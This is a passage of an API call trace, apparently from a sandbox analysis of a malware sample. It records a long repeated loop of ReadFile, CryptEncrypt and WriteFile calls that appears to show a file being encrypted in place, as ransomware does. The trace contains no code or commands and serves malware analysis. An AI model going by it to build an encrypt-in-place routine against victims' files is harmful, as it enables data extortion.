lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.095] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.095] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.095] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.095] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.095] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.095] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.095] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.095] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.095] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.095] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.095] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.096] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.096] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.096] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.096] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.096] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.096] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.096] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.096] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.096] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.096] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.096] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.100] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.100] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.100] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.100] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.100] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.100] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.100] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.101] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.101] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.101] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.101] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.101] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.101] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.101] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.101] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.101] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.101] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.101] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.101] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.101] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.101] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.101] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.102] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.102] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.102] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.102] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.102] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.102] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.105] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.106] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.106] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.106] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.106] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.106] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.106] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.106] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.106] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.106] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.106] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.106] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.106] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.106] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.106] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.107] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.107] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.107] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.107] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.107] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.107] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.107] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.107] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.107] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.107] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.107] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.107] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.107] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.107] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.107] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.108] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.108] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.108] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.108] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.108] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.108] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.108] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.108] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.108] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.108] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.108] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.108] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.108] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.108] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.108] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.109] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.109] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) 